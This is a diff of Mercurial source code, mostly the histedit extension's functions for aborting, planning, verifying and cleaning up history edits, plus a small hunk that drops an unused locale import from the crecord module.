2133
2129
2134 os.remove(backupfile)
2130 os.remove(backupfile)
2135
2131
2136 # check whether we should update away
2132 # check whether we should update away
2137 if repo.unfiltered().revs(
2133 if repo.unfiltered().revs(
2138 b'parents() and (%n or %ln::)',
2134 b'parents() and (%n or %ln::)',
2139 state.parentctxnode,
2135 state.parentctxnode,
2140 leafs | tmpnodes,
2136 leafs | tmpnodes,
2141 ):
2137 ):
2142 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2138 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2143 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2139 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2144 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2140 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2145 except Exception:
2141 except Exception:
2146 if state.inprogress():
2142 if state.inprogress():
2147 ui.warn(
2143 ui.warn(
2148 _(
2144 _(
2149 b'warning: encountered an exception during histedit '
2145 b'warning: encountered an exception during histedit '
2150 b'--abort; the repository may not have been completely '
2146 b'--abort; the repository may not have been completely '
2151 b'cleaned up\n'
2147 b'cleaned up\n'
2152 )
2148 )
2153 )
2149 )
2154 raise
2150 raise
2155 finally:
2151 finally:
2156 state.clear()
2152 state.clear()
2157
2153
2158
2154
2159 def hgaborthistedit(ui, repo):
2155 def hgaborthistedit(ui, repo):
2160 state = histeditstate(repo)
2156 state = histeditstate(repo)
2161 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2157 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2162 with repo.wlock() as wlock, repo.lock() as lock:
2158 with repo.wlock() as wlock, repo.lock() as lock:
2163 state.wlock = wlock
2159 state.wlock = wlock
2164 state.lock = lock
2160 state.lock = lock
2165 _aborthistedit(ui, repo, state, nobackup=nobackup)
2161 _aborthistedit(ui, repo, state, nobackup=nobackup)
2166
2162
2167
2163
2168 def _edithisteditplan(ui, repo, state, rules):
2164 def _edithisteditplan(ui, repo, state, rules):
2169 state.read()
2165 state.read()
2170 if not rules:
2166 if not rules:
2171 comment = geteditcomment(
2167 comment = geteditcomment(
2172 ui, node.short(state.parentctxnode), node.short(state.topmost)
2168 ui, node.short(state.parentctxnode), node.short(state.topmost)
2173 )
2169 )
2174 rules = ruleeditor(repo, ui, state.actions, comment)
2170 rules = ruleeditor(repo, ui, state.actions, comment)
2175 else:
2171 else:
2176 rules = _readfile(ui, rules)
2172 rules = _readfile(ui, rules)
2177 actions = parserules(rules, state)
2173 actions = parserules(rules, state)
2178 ctxs = [repo[act.node] for act in state.actions if act.node]
2174 ctxs = [repo[act.node] for act in state.actions if act.node]
2179 warnverifyactions(ui, repo, actions, state, ctxs)
2175 warnverifyactions(ui, repo, actions, state, ctxs)
2180 state.actions = actions
2176 state.actions = actions
2181 state.write()
2177 state.write()
2182
2178
2183
2179
2184 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2180 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2185 outg = opts.get(b'outgoing')
2181 outg = opts.get(b'outgoing')
2186 rules = opts.get(b'commands', b'')
2182 rules = opts.get(b'commands', b'')
2187 force = opts.get(b'force')
2183 force = opts.get(b'force')
2188
2184
2189 cmdutil.checkunfinished(repo)
2185 cmdutil.checkunfinished(repo)
2190 cmdutil.bailifchanged(repo)
2186 cmdutil.bailifchanged(repo)
2191
2187
2192 topmost = repo.dirstate.p1()
2188 topmost = repo.dirstate.p1()
2193 if outg:
2189 if outg:
2194 if freeargs:
2190 if freeargs:
2195 remote = freeargs[0]
2191 remote = freeargs[0]
2196 else:
2192 else:
2197 remote = None
2193 remote = None
2198 root = findoutgoing(ui, repo, remote, force, opts)
2194 root = findoutgoing(ui, repo, remote, force, opts)
2199 else:
2195 else:
2200 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2196 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2201 if len(rr) != 1:
2197 if len(rr) != 1:
2202 raise error.Abort(
2198 raise error.Abort(
2203 _(
2199 _(
2204 b'The specified revisions must have '
2200 b'The specified revisions must have '
2205 b'exactly one common root'
2201 b'exactly one common root'
2206 )
2202 )
2207 )
2203 )
2208 root = rr[0].node()
2204 root = rr[0].node()
2209
2205
2210 revs = between(repo, root, topmost, state.keep)
2206 revs = between(repo, root, topmost, state.keep)
2211 if not revs:
2207 if not revs:
2212 raise error.Abort(
2208 raise error.Abort(
2213 _(b'%s is not an ancestor of working directory') % node.short(root)
2209 _(b'%s is not an ancestor of working directory') % node.short(root)
2214 )
2210 )
2215
2211
2216 ctxs = [repo[r] for r in revs]
2212 ctxs = [repo[r] for r in revs]
2217
2213
2218 wctx = repo[None]
2214 wctx = repo[None]
2219 # Please don't ask me why `ancestors` is this value. I figured it
2215 # Please don't ask me why `ancestors` is this value. I figured it
2220 # out with print-debugging, not by actually understanding what the
2216 # out with print-debugging, not by actually understanding what the
2221 # merge code is doing. :(
2217 # merge code is doing. :(
2222 ancs = [repo[b'.']]
2218 ancs = [repo[b'.']]
2223 # Sniff-test to make sure we won't collide with untracked files in
2219 # Sniff-test to make sure we won't collide with untracked files in
2224 # the working directory. If we don't do this, we can get a
2220 # the working directory. If we don't do this, we can get a
2225 # collision after we've started histedit and backing out gets ugly
2221 # collision after we've started histedit and backing out gets ugly
2226 # for everyone, especially the user.
2222 # for everyone, especially the user.
2227 for c in [ctxs[0].p1()] + ctxs:
2223 for c in [ctxs[0].p1()] + ctxs:
2228 try:
2224 try:
2229 mergemod.calculateupdates(
2225 mergemod.calculateupdates(
2230 repo,
2226 repo,
2231 wctx,
2227 wctx,
2232 c,
2228 c,
2233 ancs,
2229 ancs,
2234 # These parameters were determined by print-debugging
2230 # These parameters were determined by print-debugging
2235 # what happens later on inside histedit.
2231 # what happens later on inside histedit.
2236 branchmerge=False,
2232 branchmerge=False,
2237 force=False,
2233 force=False,
2238 acceptremote=False,
2234 acceptremote=False,
2239 followcopies=False,
2235 followcopies=False,
2240 )
2236 )
2241 except error.Abort:
2237 except error.Abort:
2242 raise error.Abort(
2238 raise error.Abort(
2243 _(
2239 _(
2244 b"untracked files in working directory conflict with files in %s"
2240 b"untracked files in working directory conflict with files in %s"
2245 )
2241 )
2246 % c
2242 % c
2247 )
2243 )
2248
2244
2249 if not rules:
2245 if not rules:
2250 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2246 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2251 actions = [pick(state, r) for r in revs]
2247 actions = [pick(state, r) for r in revs]
2252 rules = ruleeditor(repo, ui, actions, comment)
2248 rules = ruleeditor(repo, ui, actions, comment)
2253 else:
2249 else:
2254 rules = _readfile(ui, rules)
2250 rules = _readfile(ui, rules)
2255 actions = parserules(rules, state)
2251 actions = parserules(rules, state)
2256 warnverifyactions(ui, repo, actions, state, ctxs)
2252 warnverifyactions(ui, repo, actions, state, ctxs)
2257
2253
2258 parentctxnode = repo[root].p1().node()
2254 parentctxnode = repo[root].p1().node()
2259
2255
2260 state.parentctxnode = parentctxnode
2256 state.parentctxnode = parentctxnode
2261 state.actions = actions
2257 state.actions = actions
2262 state.topmost = topmost
2258 state.topmost = topmost
2263 state.replacements = []
2259 state.replacements = []
2264
2260
2265 ui.log(
2261 ui.log(
2266 b"histedit",
2262 b"histedit",
2267 b"%d actions to histedit\n",
2263 b"%d actions to histedit\n",
2268 len(actions),
2264 len(actions),
2269 histedit_num_actions=len(actions),
2265 histedit_num_actions=len(actions),
2270 )
2266 )
2271
2267
2272 # Create a backup so we can always abort completely.
2268 # Create a backup so we can always abort completely.
2273 backupfile = None
2269 backupfile = None
2274 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2270 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2275 backupfile = repair.backupbundle(
2271 backupfile = repair.backupbundle(
2276 repo, [parentctxnode], [topmost], root, b'histedit'
2272 repo, [parentctxnode], [topmost], root, b'histedit'
2277 )
2273 )
2278 state.backupfile = backupfile
2274 state.backupfile = backupfile
2279
2275
2280
2276
2281 def _getsummary(ctx):
2277 def _getsummary(ctx):
2282 # a common pattern is to extract the summary but default to the empty
2278 # a common pattern is to extract the summary but default to the empty
2283 # string
2279 # string
2284 summary = ctx.description() or b''
2280 summary = ctx.description() or b''
2285 if summary:
2281 if summary:
2286 summary = summary.splitlines()[0]
2282 summary = summary.splitlines()[0]
2287 return summary
2283 return summary
2288
2284
2289
2285
2290 def bootstrapcontinue(ui, state, opts):
2286 def bootstrapcontinue(ui, state, opts):
2291 repo = state.repo
2287 repo = state.repo
2292
2288
2293 ms = mergestatemod.mergestate.read(repo)
2289 ms = mergestatemod.mergestate.read(repo)
2294 mergeutil.checkunresolved(ms)
2290 mergeutil.checkunresolved(ms)
2295
2291
2296 if state.actions:
2292 if state.actions:
2297 actobj = state.actions.pop(0)
2293 actobj = state.actions.pop(0)
2298
2294
2299 if _isdirtywc(repo):
2295 if _isdirtywc(repo):
2300 actobj.continuedirty()
2296 actobj.continuedirty()
2301 if _isdirtywc(repo):
2297 if _isdirtywc(repo):
2302 abortdirty()
2298 abortdirty()
2303
2299
2304 parentctx, replacements = actobj.continueclean()
2300 parentctx, replacements = actobj.continueclean()
2305
2301
2306 state.parentctxnode = parentctx.node()
2302 state.parentctxnode = parentctx.node()
2307 state.replacements.extend(replacements)
2303 state.replacements.extend(replacements)
2308
2304
2309 return state
2305 return state
2310
2306
2311
2307
2312 def between(repo, old, new, keep):
2308 def between(repo, old, new, keep):
2313 """select and validate the set of revision to edit
2309 """select and validate the set of revision to edit
2314
2310
2315 When keep is false, the specified set can't have children."""
2311 When keep is false, the specified set can't have children."""
2316 revs = repo.revs(b'%n::%n', old, new)
2312 revs = repo.revs(b'%n::%n', old, new)
2317 if revs and not keep:
2313 if revs and not keep:
2318 rewriteutil.precheck(repo, revs, b'edit')
2314 rewriteutil.precheck(repo, revs, b'edit')
2319 if repo.revs(b'(%ld) and merge()', revs):
2315 if repo.revs(b'(%ld) and merge()', revs):
2320 raise error.Abort(_(b'cannot edit history that contains merges'))
2316 raise error.Abort(_(b'cannot edit history that contains merges'))
2321 return pycompat.maplist(repo.changelog.node, revs)
2317 return pycompat.maplist(repo.changelog.node, revs)
2322
2318
2323
2319
2324 def ruleeditor(repo, ui, actions, editcomment=b""):
2320 def ruleeditor(repo, ui, actions, editcomment=b""):
2325 """open an editor to edit rules
2321 """open an editor to edit rules
2326
2322
2327 rules are in the format [ [act, ctx], ...] like in state.rules
2323 rules are in the format [ [act, ctx], ...] like in state.rules
2328 """
2324 """
2329 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2325 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2330 newact = util.sortdict()
2326 newact = util.sortdict()
2331 for act in actions:
2327 for act in actions:
2332 ctx = repo[act.node]
2328 ctx = repo[act.node]
2333 summary = _getsummary(ctx)
2329 summary = _getsummary(ctx)
2334 fword = summary.split(b' ', 1)[0].lower()
2330 fword = summary.split(b' ', 1)[0].lower()
2335 added = False
2331 added = False
2336
2332
2337 # if it doesn't end with the special character '!' just skip this
2333 # if it doesn't end with the special character '!' just skip this
2338 if fword.endswith(b'!'):
2334 if fword.endswith(b'!'):
2339 fword = fword[:-1]
2335 fword = fword[:-1]
2340 if fword in primaryactions | secondaryactions | tertiaryactions:
2336 if fword in primaryactions | secondaryactions | tertiaryactions:
2341 act.verb = fword
2337 act.verb = fword
2342 # get the target summary
2338 # get the target summary
2343 tsum = summary[len(fword) + 1 :].lstrip()
2339 tsum = summary[len(fword) + 1 :].lstrip()
2344 # safe but slow: reverse iterate over the actions so we
2340 # safe but slow: reverse iterate over the actions so we
2345 # don't clash on two commits having the same summary
2341 # don't clash on two commits having the same summary
2346 for na, l in reversed(list(pycompat.iteritems(newact))):
2342 for na, l in reversed(list(pycompat.iteritems(newact))):
2347 actx = repo[na.node]
2343 actx = repo[na.node]
2348 asum = _getsummary(actx)
2344 asum = _getsummary(actx)
2349 if asum == tsum:
2345 if asum == tsum:
2350 added = True
2346 added = True
2351 l.append(act)
2347 l.append(act)
2352 break
2348 break
2353
2349
2354 if not added:
2350 if not added:
2355 newact[act] = []
2351 newact[act] = []
2356
2352
2357 # copy over and flatten the new list
2353 # copy over and flatten the new list
2358 actions = []
2354 actions = []
2359 for na, l in pycompat.iteritems(newact):
2355 for na, l in pycompat.iteritems(newact):
2360 actions.append(na)
2356 actions.append(na)
2361 actions += l
2357 actions += l
2362
2358
2363 rules = b'\n'.join([act.torule() for act in actions])
2359 rules = b'\n'.join([act.torule() for act in actions])
2364 rules += b'\n\n'
2360 rules += b'\n\n'
2365 rules += editcomment
2361 rules += editcomment
2366 rules = ui.edit(
2362 rules = ui.edit(
2367 rules,
2363 rules,
2368 ui.username(),
2364 ui.username(),
2369 {b'prefix': b'histedit'},
2365 {b'prefix': b'histedit'},
2370 repopath=repo.path,
2366 repopath=repo.path,
2371 action=b'histedit',
2367 action=b'histedit',
2372 )
2368 )
2373
2369
2374 # Save edit rules in .hg/histedit-last-edit.txt in case
2370 # Save edit rules in .hg/histedit-last-edit.txt in case
2375 # the user needs to ask for help after something
2371 # the user needs to ask for help after something
2376 # surprising happens.
2372 # surprising happens.
2377 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2373 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2378 f.write(rules)
2374 f.write(rules)
2379
2375
2380 return rules
2376 return rules
2381
2377
2382
2378
2383 def parserules(rules, state):
2379 def parserules(rules, state):
2384 """Read the histedit rules string and return list of action objects """
2380 """Read the histedit rules string and return list of action objects """
2385 rules = [
2381 rules = [
2386 l
2382 l
2387 for l in (r.strip() for r in rules.splitlines())
2383 for l in (r.strip() for r in rules.splitlines())
2388 if l and not l.startswith(b'#')
2384 if l and not l.startswith(b'#')
2389 ]
2385 ]
2390 actions = []
2386 actions = []
2391 for r in rules:
2387 for r in rules:
2392 if b' ' not in r:
2388 if b' ' not in r:
2393 raise error.ParseError(_(b'malformed line "%s"') % r)
2389 raise error.ParseError(_(b'malformed line "%s"') % r)
2394 verb, rest = r.split(b' ', 1)
2390 verb, rest = r.split(b' ', 1)
2395
2391
2396 if verb not in actiontable:
2392 if verb not in actiontable:
2397 raise error.ParseError(_(b'unknown action "%s"') % verb)
2393 raise error.ParseError(_(b'unknown action "%s"') % verb)
2398
2394
2399 action = actiontable[verb].fromrule(state, rest)
2395 action = actiontable[verb].fromrule(state, rest)
2400 actions.append(action)
2396 actions.append(action)
2401 return actions
2397 return actions
2402
2398
2403
2399
2404 def warnverifyactions(ui, repo, actions, state, ctxs):
2400 def warnverifyactions(ui, repo, actions, state, ctxs):
2405 try:
2401 try:
2406 verifyactions(actions, state, ctxs)
2402 verifyactions(actions, state, ctxs)
2407 except error.ParseError:
2403 except error.ParseError:
2408 if repo.vfs.exists(b'histedit-last-edit.txt'):
2404 if repo.vfs.exists(b'histedit-last-edit.txt'):
2409 ui.warn(
2405 ui.warn(
2410 _(
2406 _(
2411 b'warning: histedit rules saved '
2407 b'warning: histedit rules saved '
2412 b'to: .hg/histedit-last-edit.txt\n'
2408 b'to: .hg/histedit-last-edit.txt\n'
2413 )
2409 )
2414 )
2410 )
2415 raise
2411 raise
2416
2412
2417
2413
2418 def verifyactions(actions, state, ctxs):
2414 def verifyactions(actions, state, ctxs):
2419 """Verify that there exists exactly one action per given changeset and
2415 """Verify that there exists exactly one action per given changeset and
2420 other constraints.
2416 other constraints.
2421
2417
2422 Will abort if there are to many or too few rules, a malformed rule,
2418 Will abort if there are to many or too few rules, a malformed rule,
2423 or a rule on a changeset outside of the user-given range.
2419 or a rule on a changeset outside of the user-given range.
2424 """
2420 """
2425 expected = {c.node() for c in ctxs}
2421 expected = {c.node() for c in ctxs}
2426 seen = set()
2422 seen = set()
2427 prev = None
2423 prev = None
2428
2424
2429 if actions and actions[0].verb in [b'roll', b'fold']:
2425 if actions and actions[0].verb in [b'roll', b'fold']:
2430 raise error.ParseError(
2426 raise error.ParseError(
2431 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2427 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2432 )
2428 )
2433
2429
2434 for action in actions:
2430 for action in actions:
2435 action.verify(prev, expected, seen)
2431 action.verify(prev, expected, seen)
2436 prev = action
2432 prev = action
2437 if action.node is not None:
2433 if action.node is not None:
2438 seen.add(action.node)
2434 seen.add(action.node)
2439 missing = sorted(expected - seen) # sort to stabilize output
2435 missing = sorted(expected - seen) # sort to stabilize output
2440
2436
2441 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2437 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2442 if len(actions) == 0:
2438 if len(actions) == 0:
2443 raise error.ParseError(
2439 raise error.ParseError(
2444 _(b'no rules provided'),
2440 _(b'no rules provided'),
2445 hint=_(b'use strip extension to remove commits'),
2441 hint=_(b'use strip extension to remove commits'),
2446 )
2442 )
2447
2443
2448 drops = [drop(state, n) for n in missing]
2444 drops = [drop(state, n) for n in missing]
2449 # put the in the beginning so they execute immediately and
2445 # put the in the beginning so they execute immediately and
2450 # don't show in the edit-plan in the future
2446 # don't show in the edit-plan in the future
2451 actions[:0] = drops
2447 actions[:0] = drops
2452 elif missing:
2448 elif missing:
2453 raise error.ParseError(
2449 raise error.ParseError(
2454 _(b'missing rules for changeset %s') % node.short(missing[0]),
2450 _(b'missing rules for changeset %s') % node.short(missing[0]),
2455 hint=_(
2451 hint=_(
2456 b'use "drop %s" to discard, see also: '
2452 b'use "drop %s" to discard, see also: '
2457 b"'hg help -e histedit.config'"
2453 b"'hg help -e histedit.config'"
2458 )
2454 )
2459 % node.short(missing[0]),
2455 % node.short(missing[0]),
2460 )
2456 )
2461
2457
2462
2458
2463 def adjustreplacementsfrommarkers(repo, oldreplacements):
2459 def adjustreplacementsfrommarkers(repo, oldreplacements):
2464 """Adjust replacements from obsolescence markers
2460 """Adjust replacements from obsolescence markers
2465
2461
2466 Replacements structure is originally generated based on
2462 Replacements structure is originally generated based on
2467 histedit's state and does not account for changes that are
2463 histedit's state and does not account for changes that are
2468 not recorded there. This function fixes that by adding
2464 not recorded there. This function fixes that by adding
2469 data read from obsolescence markers"""
2465 data read from obsolescence markers"""
2470 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2466 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2471 return oldreplacements
2467 return oldreplacements
2472
2468
2473 unfi = repo.unfiltered()
2469 unfi = repo.unfiltered()
2474 get_rev = unfi.changelog.index.get_rev
2470 get_rev = unfi.changelog.index.get_rev
2475 obsstore = repo.obsstore
2471 obsstore = repo.obsstore
2476 newreplacements = list(oldreplacements)
2472 newreplacements = list(oldreplacements)
2477 oldsuccs = [r[1] for r in oldreplacements]
2473 oldsuccs = [r[1] for r in oldreplacements]
2478 # successors that have already been added to succstocheck once
2474 # successors that have already been added to succstocheck once
2479 seensuccs = set().union(
2475 seensuccs = set().union(
2480 *oldsuccs
2476 *oldsuccs
2481 ) # create a set from an iterable of tuples
2477 ) # create a set from an iterable of tuples
2482 succstocheck = list(seensuccs)
2478 succstocheck = list(seensuccs)
2483 while succstocheck:
2479 while succstocheck:
2484 n = succstocheck.pop()
2480 n = succstocheck.pop()
2485 missing = get_rev(n) is None
2481 missing = get_rev(n) is None
2486 markers = obsstore.successors.get(n, ())
2482 markers = obsstore.successors.get(n, ())
2487 if missing and not markers:
2483 if missing and not markers:
2488 # dead end, mark it as such
2484 # dead end, mark it as such
2489 newreplacements.append((n, ()))
2485 newreplacements.append((n, ()))
2490 for marker in markers:
2486 for marker in markers:
2491 nsuccs = marker[1]
2487 nsuccs = marker[1]
2492 newreplacements.append((n, nsuccs))
2488 newreplacements.append((n, nsuccs))
2493 for nsucc in nsuccs:
2489 for nsucc in nsuccs:
2494 if nsucc not in seensuccs:
2490 if nsucc not in seensuccs:
2495 seensuccs.add(nsucc)
2491 seensuccs.add(nsucc)
2496 succstocheck.append(nsucc)
2492 succstocheck.append(nsucc)
2497
2493
2498 return newreplacements
2494 return newreplacements
2499
2495
2500
2496
2501 def processreplacement(state):
2497 def processreplacement(state):
2502 """process the list of replacements to return
2498 """process the list of replacements to return
2503
2499
2504 1) the final mapping between original and created nodes
2500 1) the final mapping between original and created nodes
2505 2) the list of temporary node created by histedit
2501 2) the list of temporary node created by histedit
2506 3) the list of new commit created by histedit"""
2502 3) the list of new commit created by histedit"""
2507 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2503 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2508 allsuccs = set()
2504 allsuccs = set()
2509 replaced = set()
2505 replaced = set()
2510 fullmapping = {}
2506 fullmapping = {}
2511 # initialize basic set
2507 # initialize basic set
2512 # fullmapping records all operations recorded in replacement
2508 # fullmapping records all operations recorded in replacement
2513 for rep in replacements:
2509 for rep in replacements:
2514 allsuccs.update(rep[1])
2510 allsuccs.update(rep[1])
2515 replaced.add(rep[0])
2511 replaced.add(rep[0])
2516 fullmapping.setdefault(rep[0], set()).update(rep[1])
2512 fullmapping.setdefault(rep[0], set()).update(rep[1])
2517 new = allsuccs - replaced
2513 new = allsuccs - replaced
2518 tmpnodes = allsuccs & replaced
2514 tmpnodes = allsuccs & replaced
2519 # Reduce content fullmapping into direct relation between original nodes
2515 # Reduce content fullmapping into direct relation between original nodes
2520 # and final node created during history edition
2516 # and final node created during history edition
2521 # Dropped changeset are replaced by an empty list
2517 # Dropped changeset are replaced by an empty list
2522 toproceed = set(fullmapping)
2518 toproceed = set(fullmapping)
2523 final = {}
2519 final = {}
2524 while toproceed:
2520 while toproceed:
2525 for x in list(toproceed):
2521 for x in list(toproceed):
2526 succs = fullmapping[x]
2522 succs = fullmapping[x]
2527 for s in list(succs):
2523 for s in list(succs):
2528 if s in toproceed:
2524 if s in toproceed:
2529 # non final node with unknown closure
2525 # non final node with unknown closure
2530 # We can't process this now
2526 # We can't process this now
2531 break
2527 break
2532 elif s in final:
2528 elif s in final:
2533 # non final node, replace with closure
2529 # non final node, replace with closure
2534 succs.remove(s)
2530 succs.remove(s)
2535 succs.update(final[s])
2531 succs.update(final[s])
2536 else:
2532 else:
2537 final[x] = succs
2533 final[x] = succs
2538 toproceed.remove(x)
2534 toproceed.remove(x)
2539 # remove tmpnodes from final mapping
2535 # remove tmpnodes from final mapping
2540 for n in tmpnodes:
2536 for n in tmpnodes:
2541 del final[n]
2537 del final[n]
2542 # we expect all changes involved in final to exist in the repo
2538 # we expect all changes involved in final to exist in the repo
2543 # turn `final` into list (topologically sorted)
2539 # turn `final` into list (topologically sorted)
2544 get_rev = state.repo.changelog.index.get_rev
2540 get_rev = state.repo.changelog.index.get_rev
2545 for prec, succs in final.items():
2541 for prec, succs in final.items():
2546 final[prec] = sorted(succs, key=get_rev)
2542 final[prec] = sorted(succs, key=get_rev)
2547
2543
2548 # computed topmost element (necessary for bookmark)
2544 # computed topmost element (necessary for bookmark)
2549 if new:
2545 if new:
2550 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2546 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2551 elif not final:
2547 elif not final:
2552 # Nothing rewritten at all. we won't need `newtopmost`
2548 # Nothing rewritten at all. we won't need `newtopmost`
2553 # It is the same as `oldtopmost` and `processreplacement` know it
2549 # It is the same as `oldtopmost` and `processreplacement` know it
2554 newtopmost = None
2550 newtopmost = None
2555 else:
2551 else:
2556 # every body died. The newtopmost is the parent of the root.
2552 # every body died. The newtopmost is the parent of the root.
2557 r = state.repo.changelog.rev
2553 r = state.repo.changelog.rev
2558 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2554 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2559
2555
2560 return final, tmpnodes, new, newtopmost
2556 return final, tmpnodes, new, newtopmost
2561
2557
2562
2558
2563 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2559 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2564 """Move bookmark from oldtopmost to newly created topmost
2560 """Move bookmark from oldtopmost to newly created topmost
2565
2561
2566 This is arguably a feature and we may only want that for the active
2562 This is arguably a feature and we may only want that for the active
2567 bookmark. But the behavior is kept compatible with the old version for now.
2563 bookmark. But the behavior is kept compatible with the old version for now.
2568 """
2564 """
2569 if not oldtopmost or not newtopmost:
2565 if not oldtopmost or not newtopmost:
2570 return
2566 return
2571 oldbmarks = repo.nodebookmarks(oldtopmost)
2567 oldbmarks = repo.nodebookmarks(oldtopmost)
2572 if oldbmarks:
2568 if oldbmarks:
2573 with repo.lock(), repo.transaction(b'histedit') as tr:
2569 with repo.lock(), repo.transaction(b'histedit') as tr:
2574 marks = repo._bookmarks
2570 marks = repo._bookmarks
2575 changes = []
2571 changes = []
2576 for name in oldbmarks:
2572 for name in oldbmarks:
2577 changes.append((name, newtopmost))
2573 changes.append((name, newtopmost))
2578 marks.applychanges(repo, tr, changes)
2574 marks.applychanges(repo, tr, changes)
2579
2575
2580
2576
2581 def cleanupnode(ui, repo, nodes, nobackup=False):
2577 def cleanupnode(ui, repo, nodes, nobackup=False):
2582 """strip a group of nodes from the repository
2578 """strip a group of nodes from the repository
2583
2579
2584 The set of node to strip may contains unknown nodes."""
2580 The set of node to strip may contains unknown nodes."""
2585 with repo.lock():
2581 with repo.lock():
2586 # do not let filtering get in the way of the cleanse
2582 # do not let filtering get in the way of the cleanse
2587 # we should probably get rid of obsolescence marker created during the
2583 # we should probably get rid of obsolescence marker created during the
2588 # histedit, but we currently do not have such information.
2584 # histedit, but we currently do not have such information.
2589 repo = repo.unfiltered()
2585 repo = repo.unfiltered()
2590 # Find all nodes that need to be stripped
2586 # Find all nodes that need to be stripped
2591 # (we use %lr instead of %ln to silently ignore unknown items)
2587 # (we use %lr instead of %ln to silently ignore unknown items)
2592 has_node = repo.changelog.index.has_node
2588 has_node = repo.changelog.index.has_node
2593 nodes = sorted(n for n in nodes if has_node(n))
2589 nodes = sorted(n for n in nodes if has_node(n))
2594 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2590 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2595 if roots:
2591 if roots:
2596 backup = not nobackup
2592 backup = not nobackup
2597 repair.strip(ui, repo, roots, backup=backup)
2593 repair.strip(ui, repo, roots, backup=backup)
2598
2594
2599
2595
2600 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2596 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2601 if isinstance(nodelist, bytes):
2597 if isinstance(nodelist, bytes):
2602 nodelist = [nodelist]
2598 nodelist = [nodelist]
2603 state = histeditstate(repo)
2599 state = histeditstate(repo)
2604 if state.inprogress():
2600 if state.inprogress():
2605 state.read()
2601 state.read()
2606 histedit_nodes = {
2602 histedit_nodes = {
2607 action.node for action in state.actions if action.node
2603 action.node for action in state.actions if action.node
2608 }
2604 }
2609 common_nodes = histedit_nodes & set(nodelist)
2605 common_nodes = histedit_nodes & set(nodelist)
2610 if common_nodes:
2606 if common_nodes:
2611 raise error.Abort(
2607 raise error.Abort(
2612 _(b"histedit in progress, can't strip %s")
2608 _(b"histedit in progress, can't strip %s")
2613 % b', '.join(node.short(x) for x in common_nodes)
2609 % b', '.join(node.short(x) for x in common_nodes)
2614 )
2610 )
2615 return orig(ui, repo, nodelist, *args, **kwargs)
2611 return orig(ui, repo, nodelist, *args, **kwargs)
2616
2612
2617
2613
2618 extensions.wrapfunction(repair, b'strip', stripwrapper)
2614 extensions.wrapfunction(repair, b'strip', stripwrapper)
2619
2615
2620
2616
2621 def summaryhook(ui, repo):
2617 def summaryhook(ui, repo):
2622 state = histeditstate(repo)
2618 state = histeditstate(repo)
2623 if not state.inprogress():
2619 if not state.inprogress():
2624 return
2620 return
2625 state.read()
2621 state.read()
2626 if state.actions:
2622 if state.actions:
2627 # i18n: column positioning for "hg summary"
2623 # i18n: column positioning for "hg summary"
2628 ui.write(
2624 ui.write(
2629 _(b'hist: %s (histedit --continue)\n')
2625 _(b'hist: %s (histedit --continue)\n')
2630 % (
2626 % (
2631 ui.label(_(b'%d remaining'), b'histedit.remaining')
2627 ui.label(_(b'%d remaining'), b'histedit.remaining')
2632 % len(state.actions)
2628 % len(state.actions)
2633 )
2629 )
2634 )
2630 )
2635
2631
2636
2632
2637 def extsetup(ui):
2633 def extsetup(ui):
2638 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2634 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2639 statemod.addunfinished(
2635 statemod.addunfinished(
2640 b'histedit',
2636 b'histedit',
2641 fname=b'histedit-state',
2637 fname=b'histedit-state',
2642 allowcommit=True,
2638 allowcommit=True,
2643 continueflag=True,
2639 continueflag=True,
2644 abortfunc=hgaborthistedit,
2640 abortfunc=hgaborthistedit,
2645 )
2641 )
@@ -1,2029 +1,2026 b''
1 # stuff related specifically to patch manipulation / parsing
1 # stuff related specifically to patch manipulation / parsing
2 #
2 #
3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 #
7 #
8 # This code is based on the Mark Edgington's crecord extension.
8 # This code is based on the Mark Edgington's crecord extension.
9 # (Itself based on Bryan O'Sullivan's record extension.)
9 # (Itself based on Bryan O'Sullivan's record extension.)
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import locale
14 import os
13 import os
15 import re
14 import re
16 import signal
15 import signal
17
16
18 from .i18n import _
17 from .i18n import _
19 from .pycompat import (
18 from .pycompat import (
